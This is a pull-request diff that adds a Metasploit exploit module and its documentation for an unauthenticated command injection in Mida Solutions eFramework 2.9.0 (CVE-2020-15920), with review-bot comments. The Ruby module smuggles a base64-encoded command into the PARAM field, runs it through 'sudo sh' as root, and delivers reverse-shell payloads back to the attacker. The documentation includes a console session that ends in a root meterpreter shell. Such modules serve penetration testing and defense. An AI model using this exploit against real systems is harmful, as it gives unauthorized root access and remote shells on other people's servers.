Land #14074, add Mida eFramework command injection
documentation/modules/exploit/linux/http/mida_solutions_eframework_ajaxreq_rce.md
@@ -0,0 +1,64 @@ | ||
## Vulnerable Application | ||
|
||
This module exploits a command injection vulnerability in | ||
[Mida Solutions eFramework](https://www.midasolutions.com/) | ||
version 2.9.0 and prior. | ||
|
||
The `ajaxreq.php` file allows unauthenticated users to inject | ||
arbitrary commands in the `PARAM` parameter to be executed as | ||
the apache user. The sudo configuration permits the apache user | ||
to execute any command as root without providing a password, | ||
resulting in privileged command execution as root. | ||
|
||
This module has been successfully tested on Mida Solutions | ||
eFramework-C7-2.9.0 virtual appliance. | ||
|
||
Download: | ||
|
||
http://ova-efw.midasolutions.com/ | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
1. Do: `use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce` | ||
1. Do: `set RHOSTS [IP]` | ||
1. Do: `set payload [payload]` | ||
1. Do: `set LHOST [IP]` | ||
1. Do: `exploit` | ||
|
||
## Options | ||
|
||
### TARGETURI | ||
|
||
Base path to eFramework (Default: `/`) | ||
|
||
## Scenarios | ||
|
||
``` | ||
msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce | ||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp | ||
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123 | ||
rhosts => 172.16.191.123 | ||
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check | ||
[+] 172.16.191.123:443 - The target is vulnerable. | ||
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165 | ||
lhost => 172.16.191.165 | ||
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run | ||
[*] Started reverse TCP handler on 172.16.191.165:4444 | ||
[*] Executing automatic check (disable AutoCheck to override) | ||
[+] The target is vulnerable. | ||
[*] Sending stage (3008420 bytes) to 172.16.191.123 | ||
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400 | ||
[*] Command Stager progress - 100.00% done (897/897 bytes) | ||
meterpreter > getuid | ||
Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0) | ||
meterpreter > sysinfo | ||
Computer : 172.16.191.123 | ||
OS : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > | ||
``` |
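Review bot: the Vulnerable Application section should cite CVE-2020-15920 and the discoverer's write-up that the module's `References` array already carries, so a reader of the documentation page can reach the advisory without opening the module source. The Options section would also benefit from stating that the module appends `PDC/ajaxreq.php` to TARGETURI (see `normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php')` in the module), since on a non-default install TARGETURI must point at the eFramework root and not at the `PDC/` directory itself.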
modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb
@@ -0,0 +1,134 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
prepend Msf::Exploit::Remote::AutoCheck | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::CmdStager | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection', | ||
'Description' => %q{ | ||
This module exploits a command injection vulnerability in Mida | ||
Solutions eFramework version 2.9.0 and prior. | ||
The `ajaxreq.php` file allows unauthenticated users to inject | ||
arbitrary commands in the `PARAM` parameter to be executed as | ||
the apache user. The sudo configuration permits the apache user | ||
to execute any command as root without providing a password, | ||
resulting in privileged command execution as root. | ||
This module has been successfully tested on Mida Solutions | ||
eFramework-C7-2.9.0 virtual appliance. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'elbae', # discovery and exploit | ||
'bcoles', # Metasploit | ||
], | ||
'References' => | ||
[ | ||
['CVE', '2020-15920'], | ||
['EDB', '48768'], | ||
['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'], | ||
], | ||
'Payload' => { 'BadChars' => "\x00" }, | ||
'Targets' => | ||
[ | ||
[ | ||
'Linux (x86)', { | ||
'Arch' => ARCH_X86, | ||
'Platform' => 'linux', | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' | ||
} | ||
} | ||
], | ||
[ | ||
'Linux (x64)', { | ||
'Arch' => ARCH_X64, | ||
'Platform' => 'linux', | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' | ||
} | ||
} | ||
], | ||
[ | ||
'UNIX (cmd)', { | ||
'Arch' => ARCH_CMD, | ||
'Platform' => 'unix', | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'cmd/unix/reverse_bash' | ||
} | ||
} | ||
] | ||
], | ||
'Privileged' => true, | ||
'DisclosureDate' => '2020-07-24', | ||
'DefaultOptions' => { | ||
'RPORT' => 443, | ||
'SSL' => true | ||
}, | ||
'DefaultTarget' => 1, | ||
'Notes' => | ||
{ | ||
'Stability' => [ CRASH_SAFE ], | ||
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], | ||
'Reliability' => [ REPEATABLE_SESSION ] | ||
} | ||
) | ||
) | ||
register_options([ | ||
OptString.new('TARGETURI', [true, 'Base path to eFramework', '/']) | ||
]) | ||
end | ||
|
||
def check | ||
res = execute_command('id') | ||
|
||
unless res | ||
return CheckCode::Safe('Connection failed') | ||
end | ||
|
||
unless res.body.include?('uid=') | ||
return CheckCode::Safe('Target is not vulnerable') | ||
end | ||
|
||
CheckCode::Vulnerable | ||
end | ||
|
||
def execute_command(cmd, _opts = {}) | ||
vars_post = { | ||
'DIAGNOSIS' => ['PING', 'TRACEROUTE'].sample, | ||
'PARAM' => ";echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh" | ||
} | ||
|
||
res = send_request_cgi({ | ||
'method' => 'POST', | ||
'uri' => normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php'), | ||
'vars_post' => vars_post | ||
}, 5) | ||
|
||
if res && !res.body.blank? | ||
vprint_status("Command output: #{res.body.gsub(/<br>/, "\n")}") | ||
end | ||
|
||
res | ||
end | ||
|
||
def exploit | ||
if target.arch.first == ARCH_CMD | ||
execute_command(payload.encoded) | ||
else | ||
execute_cmdstager(linemax: 1_500, background: true) | ||
end | ||
end | ||
end |
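Review bot: in `check`, a nil response from `execute_command('id')` is mapped to `CheckCode::Safe('Connection failed')`, but a timeout or connection error (the request uses a 5 second timeout) says nothing about whether the target is vulnerable; `CheckCode::Unknown('Connection failed')` is the appropriate code there so that AutoCheck does not report an unreachable host as safe. It is also worth a comment on `check` that it is intrusive: it executes `id` through the same `;echo ...|base64 -d|sudo sh` injection as the exploit, so even a bare `check` runs a root command on the target and produces the `IOC_IN_LOGS` artifacts the Notes declare.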